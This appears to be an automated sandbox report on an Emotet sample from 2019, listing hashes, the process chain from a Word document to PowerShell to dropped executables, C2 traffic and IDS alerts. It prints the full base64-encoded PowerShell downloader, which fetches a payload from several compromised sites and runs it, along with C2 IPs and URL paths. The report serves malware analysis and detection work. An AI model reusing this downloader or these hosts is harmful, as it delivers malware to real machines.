File name: | Sample1.zip |
Full analysis: | https://app.any.run/tasks/c9f0e7af-7d86-4638-ac7e-07770f92cca2 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 15:51:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 0A45EC12B46DD39CB110AD51795C8046 |
SHA1: | F0E0D169C31336C9B091335FA0F51FD85A5C08D8 |
SHA256: | 44C818EBFF53A75E6DDFA2AC9D4BBDC889E9756F51E09B36244C02528AF8C2D0 |
SSDEEP: | 1536:E7gCRKhAqFcjVeRJ2pMcDxRDtLasa2L/6C1tj1/OtktRvwhpEhkK9xnemNy6Gdrm:wjvwfc/tL825j1EktRvk2hkgfQZrm |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 8933c0e6c9faa660545f4d5e100cb9fee10aa168f9421f3351709b593f2fe63d.bin |
---|---|
ZipUncompressedSize: | 214016 |
ZipCompressedSize: | 117673 |
ZipCRC: | 0xd599e85e |
ZipModifyDate: | 2019:10:09 15:51:02 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3060 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3152 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayyy.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3324 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABHAHIAZQBlAG4AbABhAG4AZABkAHcAegA9ACcAZgB1AG4AYwB0AGkAbwBuAGEAbABpAHQAaQBlAHMAbABpAG8AJwA7ACQAaABhAGMAawBpAG4AZwBwAHIAdwAgAD0AIAAnADgAMAA1ACcAOwAkAEkAbgB2AGUAcgBzAGUAcwB3AHEAPQAnAFUAUwBfAEQAbwBsAGwAYQByAHIAZABxACcAOwAkAHQAcgBhAG4AcwBpAHQAaQBvAG4AcABsAHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgAYQBjAGsAaQBuAGcAcAByAHcAKwAnAC4AZQB4AGUAJwA7ACQARwBvAHIAZwBlAG8AdQBzAF8AUwBvAGYAdABfAFQAYQBiAGwAZQB2AGkAbgA9ACcAUgB1AHMAdABpAGMAXwBSAHUAYgBiAGUAcgBfAEgAYQB0AGkAaABjACcAOwAkAGcAcgBlAGUAbgBiAGEAaQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAFQALgB3AEUAQgBDAEwAaQBFAE4AdAA7ACQASQBuAHQAZQBsAGwAaQBnAGUAbgB0AG4AbwB0AD0AJwBoAHQAdABwAHMAOgAvAC8AcgBlAHQAbwBzAC0AZQBuAGYAbwByAG0AYQBoAGUAcgBiAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdAB5ADgAYwAwAC8AQABoAHQAdABwAHMAOgAvAC8AZwBlAG8AcgBnAGUAcgBlAHAAbwByAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBsAHUAcwA0ADYANwA2ADIALwBAAGgAdAB0AHAAOgAvAC8AcwBjAHIAaQBiAG8ALQBjAGEAbQBlAHIAbwBvAG4ALgBjAG8AbQAvAGMAcwBzAC8AMgBmADMAMQA0ADIALwBAAGgAdAB0AHAAOgAvAC8AagB1AG4AZQBuAGcAbQBvAGoAdQAuAHgAeQB6AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbQA1ADAAMQA2ADgALwBAAGgAdAB0AHAAOgAvAC8AYQBuAGoAaQBlAHQAaQB5AHUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBkADUAMgA1ADYALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAQQBEAFAAYgBoAG4APQAnAEUAbABlAGMAdAByAG8AbgBpAGMAcwBwAHUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAcwBrAHkAXwBiAGwAdQBlAGgAdABpACAAaQBuACAAJABJAG4AdABlAGwAbABpAGcAZQBuAHQAbgBvAHQAKQB7AHQAcgB5AHsAJABnAHIAZQBlAG4AYgBhAGkALgAiAGQAbwBXAE4ATABPAGEARABmAGAAaQBgAGwAZQAiACgAJABzAGsAeQBfAGIAbAB1AGUAaAB0AGkALAAgACQAdAByAGEAbgBzAGkAdABpAG8AbgBwAGwAcQApADsAJABzAGkAbAB2AGUAcgBmAG4AZgA9ACcARABpAHIAZQBjAHQAbwByAG8AegBvACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAdAByAGEAbgBzAGkAdABpAG8AbgBwAGwAcQApAC4AIgBsAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMwA0ADEAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAHQAcgBhAG4AcwBpAHQAaQBvAG4AcABsAHEAKQA7ACQAbQB1AGwAdABpAHMAdABhAHQAZQBpAGIAbwA9ACcAQgBlAGQAZgBvAHIAZABzAGgAaQByAGUAbQBvAHQAJwA7AGIAcgBlAGEAawA7ACQARABlAHYAbwBsAHYAZQBkAG0AYgBsAD0AJwBiAGUAbgBjAGgAbQBhAHIAawBqAHAAawAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAGUAbgBpAG8AcgBhAHcAegA9ACcAbQBlAHQAaABvAGQAbwBsAG8AZwB5AGQAbgBuACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1004 | "C:\Users\admin\805.exe" | C:\Users\admin\805.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
684 | --ae5f3ebb | C:\Users\admin\805.exe | 805.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2740 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 805.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
1760 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2136 | "C:\Users\admin\AppData\Local\msptermsizes\8pUW.exe" | C:\Users\admin\AppData\Local\msptermsizes\8pUW.exe | — | msptermsizes.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2208 | --bb33c236 | C:\Users\admin\AppData\Local\msptermsizes\8puw.exe | 8pUW.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2140 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 8puw.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR73DA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3324 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS3VAXCZEPLIM1UBGJ0I.temp | — | |
MD5:— | SHA256:— | |||
3060 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3060.30623\8933c0e6c9faa660545f4d5e100cb9fee10aa168f9421f3351709b593f2fe63d.bin | document | |
MD5:2572D968C728BF0F8EEC4D73CDF66A15 | SHA256:8933C0E6C9FAA660545F4D5E100CB9FEE10AA168F9421F3351709B593F2FE63D | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\641F6BD0.wmf | wmf | |
MD5:F868E6FBA4923FAEE8F3831ECA468628 | SHA256:CCC4DF156096BCA76DC7D3E94D3F5F3FEDEB75378FF97B861E8FB60E987BF47B | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73BB5C44.wmf | wmf | |
MD5:E08B9D89B9E36C589825E371B7CA3962 | SHA256:6B4DD3F1293FC5126840F178FAFF297B71A1299E576F56C968C9DB53B99B7CC8 | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D1BEF2.wmf | wmf | |
MD5:6B3CA6398DA05DCE9373A2BCCEF20AE8 | SHA256:961A22577C02CB4DB4104503309DAF04D3629AF69F3FF55291F292C98CFBD2FA | |||
3152 | WINWORD.EXE | C:\Users\admin\Desktop\~$ayyy.doc | pgc | |
MD5:9ED79CD1A47593152895811B62EEB8D4 | SHA256:EC853A8ED1CAAB479EE821FFF24CC5668688D26925E613830D93B54278E94553 | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A916525E.wmf | wmf | |
MD5:766390287FDC534F0A0C6B298EC16308 | SHA256:0A879786C346028E118B2EE4770827FDC32EC48D835190FC4238DFFF81DC6C0E | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1BFF8E1C.wmf | wmf | |
MD5:E870187A6E54540F34302D758A57C4F7 | SHA256:60AFD97494C2BA0784C5CC0F61A32761FE13957056BABC9ECE95A15847A5CAA5 | |||
3152 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:8425F007B04CA65D8A94FC195BCCDF2E | SHA256:5E84309BB98A44B6F963874D65DD6659E0D05AFBB7770E8809778C75B1577B72 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3324 | powershell.exe | GET | 200 | 132.148.42.109:80 | http://scribo-cameroon.com/css/2f3142/ | US | executable | 612 Kb | suspicious |
904 | msptermsizes.exe | GET | 200 | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | text | 11 b | malicious |
904 | msptermsizes.exe | GET | 200 | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | text | 11 b | malicious |
1760 | msptermsizes.exe | POST | 200 | 91.83.93.105:8080 | http://91.83.93.105:8080/json/devices/ | HU | binary | 142 Kb | malicious |
904 | msptermsizes.exe | POST | 200 | 91.83.93.105:8080 | http://91.83.93.105:8080/pdf/ | HU | binary | 1.38 Mb | malicious |
904 | msptermsizes.exe | POST | 200 | 37.187.5.82:8080 | http://37.187.5.82:8080/ban/ | FR | binary | 132 b | malicious |
904 | msptermsizes.exe | POST | 200 | 37.187.5.82:8080 | http://37.187.5.82:8080/odbc/sym/ringin/merge/ | FR | binary | 132 b | malicious |
904 | msptermsizes.exe | POST | 200 | 91.83.93.105:8080 | http://91.83.93.105:8080/loadan/enabled/ringin/ | HU | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3324 | powershell.exe | 67.227.172.210:443 | retos-enformaherbal.com | Liquid Web, L.L.C | US | unknown |
3324 | powershell.exe | 132.148.42.109:80 | scribo-cameroon.com | GoDaddy.com, LLC | US | suspicious |
3324 | powershell.exe | 146.66.89.114:443 | georgereports.com | — | US | unknown |
904 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
1760 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
904 | msptermsizes.exe | 37.187.5.82:8080 | — | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
retos-enformaherbal.com |
| unknown |
georgereports.com |
| unknown |
scribo-cameroon.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3324 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3324 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3324 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1760 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
1760 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
904 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
904 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
904 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
904 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |